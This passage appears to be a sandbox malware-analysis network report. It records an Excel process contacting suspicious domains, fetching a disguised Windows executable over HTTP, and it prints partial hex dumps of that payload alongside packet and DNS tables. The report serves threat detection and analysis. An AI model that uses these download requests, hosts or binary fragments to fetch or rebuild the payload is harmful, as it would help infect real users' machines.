                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203196049 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203227997 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203244925 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203259945 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203277111 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203291893 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203306913 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203553915 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203851938 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203882933 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.203946114 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.204583883 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.204616070 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.204687119 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.205537081 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.205565929 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.205646992 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.206104994 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.206135035 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.206202030 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.207393885 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.207453966 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.207673073 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.208149910 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.208482027 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.208770037 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.208807945 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.208930969 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.209178925 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.209270954 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.209366083 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.209547043 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.209975958 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.210083961 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.210270882 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.210721016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.210911036 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.211164951 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.234905958 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.234939098 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.234956026 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.234972000 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.234994888 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.235009909 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.235029936 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.235050917 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.235233068 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.236222982 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.236249924 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.236453056 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238296032 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238334894 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238360882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238382101 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238408089 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238430977 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.238550901 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.239382982 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.239407063 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.239490986 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283107042 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283168077 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283190012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283413887 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283456087 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283478975 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.283538103 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.284358978 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.284388065 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.284403086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.284420967 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.284521103 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.285262108 CEST4434917013.224.92.73192.168.2.22
Jul 6, 2021 17:49:56.285285950 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.285303116 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.285384893 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.286106110 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.286128998 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.286147118 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.286259890 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.286976099 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.286999941 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.287014008 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.287091017 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.287856102 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.287892103 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.287914038 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.288002968 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.288702965 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.288738012 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.288759947 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.288821936 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.289599895 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.289629936 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.289705038 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.290457010 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.290488005 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.290513992 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.290535927 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.290596008 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.291358948 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.291388988 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.291413069 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.291472912 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.292234898 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.292267084 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.292287111 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.292356014 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.293082952 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.293114901 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.293135881 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.293206930 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.293981075 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.294017076 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.295362949 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.295406103 CEST | 443 | 49170 | 13.224.92.73 | 192.168.2.22
Jul 6, 2021 17:49:56.500611067 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:49:56.620697975 CEST | 49171 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 17:49:56.659501076 CEST | 80 | 49171 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 17:49:56.659626961 CEST | 49171 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 17:49:56.660301924 CEST | 49171 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 17:49:56.698905945 CEST | 80 | 49171 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 17:49:57.236242056 CEST | 80 | 49171 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 17:49:57.236459970 CEST | 80 | 49171 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 17:49:57.236563921 CEST | 49171 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 17:50:00.291042089 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:50:00.291295052 CEST | 49171 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 17:51:53.090585947 CEST | 49169 | 80 | 192.168.2.22 | 172.67.146.88
Jul 6, 2021 17:51:53.090845108 CEST | 49168 | 80 | 192.168.2.22 | 172.67.194.117
Jul 6, 2021 17:51:53.091068983 CEST | 49167 | 80 | 192.168.2.22 | 172.67.198.51
Jul 6, 2021 17:51:53.133445024 CEST | 80 | 49168 | 172.67.194.117 | 192.168.2.22
Jul 6, 2021 17:51:53.133482933 CEST | 80 | 49169 | 172.67.146.88 | 192.168.2.22
Jul 6, 2021 17:51:53.133532047 CEST | 49168 | 80 | 192.168.2.22 | 172.67.194.117
Jul 6, 2021 17:51:53.133569002 CEST | 49169 | 80 | 192.168.2.22 | 172.67.146.88
Jul 6, 2021 17:51:53.133833885 CEST | 80 | 49167 | 172.67.198.51 | 192.168.2.22
Jul 6, 2021 17:51:53.134059906 CEST | 49167 | 80 | 192.168.2.22 | 172.67.198.51

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 6, 2021 17:49:53.170819044 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:53.232239962 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:49:53.641556025 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:53.703377008 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:49:53.870624065 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:53.931377888 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:49:54.911662102 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:54.969017982 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:49:54.991873026 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:55.040765047 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:49:56.469363928 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:56.538844109 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:49:56.548119068 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:49:56.618860006 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 6, 2021 17:49:53.170819044 CEST | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | thousandsyears.download | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.641556025 CEST | 192.168.2.22 | 8.8.8.8 | 0x644c | Standard query (0) | voopeople.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.870624065 CEST | 192.168.2.22 | 8.8.8.8 | 0xd372 | Standard query (0) | uppercilio.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:54.911662102 CEST | 192.168.2.22 | 8.8.8.8 | 0x26ae | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:54.991873026 CEST | 192.168.2.22 | 8.8.8.8 | 0x8766 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:56.469363928 CEST | 192.168.2.22 | 8.8.8.8 | 0x63f2 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:56.548119068 CEST | 192.168.2.22 | 8.8.8.8 | 0x96ce | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 6, 2021 17:49:53.232239962 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | thousandsyears.download |  | 172.67.198.51 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.232239962 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | thousandsyears.download |  | 104.21.52.111 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.703377008 CEST | 8.8.8.8 | 192.168.2.22 | 0x644c | No error (0) | voopeople.fun |  | 172.67.194.117 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.703377008 CEST | 8.8.8.8 | 192.168.2.22 | 0x644c | No error (0) | voopeople.fun |  | 104.21.12.122 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.931377888 CEST | 8.8.8.8 | 192.168.2.22 | 0xd372 | No error (0) | uppercilio.fun |  | 172.67.146.88 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:53.931377888 CEST | 8.8.8.8 | 192.168.2.22 | 0xd372 | No error (0) | uppercilio.fun |  | 104.21.55.83 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:54.969017982 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:49:54.969017982 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:49:54.969017982 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:55.040765047 CEST | 8.8.8.8 | 192.168.2.22 | 0x8766 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:49:55.040765047 CEST | 8.8.8.8 | 192.168.2.22 | 0x8766 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:49:55.040765047 CEST | 8.8.8.8 | 192.168.2.22 | 0x8766 | No error (0) | dr49lng3n1n2s.cloudfront.net |  | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:56.538844109 CEST | 8.8.8.8 | 192.168.2.22 | 0x63f2 | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:56.538844109 CEST | 8.8.8.8 | 192.168.2.22 | 0x63f2 | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:56.618860006 CEST | 8.8.8.8 | 192.168.2.22 | 0x96ce | No error (0) | astrocycle.download |  | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:49:56.618860006 CEST | 8.8.8.8 | 192.168.2.22 | 0x96ce | No error (0) | astrocycle.download |  | 104.21.37.209 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• thousandsyears.download
• voopeople.fun
• uppercilio.fun
• astrocycle.download

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 172.67.198.51 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:49:53.282797098 CEST | 0 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: thousandsyears.download
Connection: Keep-Alive
Jul 6, 2021 17:49:53.625552893 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:49:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6802
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jYU9ErDF6o9i7wTbXhhJXzj4nJ9qQhb1QEIw4hIFXEFT2R4LgB0AnvbF0ckBqLSLMuiqW4j8fFEUSj4psW%2FWzRQIWeJ5BkRRsGSqzhGWcF1TpAt1iSBKrgJ3DonobShkyd%2Feh%2BA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9fc50381e4e3d-FRA
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
Data Ascii: 14
Jul 6, 2021 17:49:53.625590086 CEST | 1 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 172.67.194.117 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:49:53.745779037 CEST | 2 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: voopeople.fun
Connection: Keep-Alive
Jul 6, 2021 17:49:53.810208082 CEST | 3 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:49:53 GMT
Content-Type: application/octet-stream
Content-Length: 57856
Connection: keep-alive
Content-Disposition: attachment; filename=lsdfik.fml
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6801
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BDNChGJ59YNjBFqZa4TKC4pQsxnL7NdGF%2B60x6I5VvFXRTOmismddTlrNVyVond1jowHhLHRmejjuZTFiFP3ft4aoDN5DaqrJgjCHBHKwv4qBt4fxYB8wmsYcw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9fc531afd2c22-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
Jul 6, 2021 17:49:53.810242891 CEST | 5 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: @@
Jul 6, 2021 17:49:53.810266972 CEST | 6 | IN | Data Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
Jul 6, 2021 17:49:53.810290098 CEST | 8 | IN | Data Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
Jul 6, 2021 17:49:53.810312986 CEST | 9 | IN | Data Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
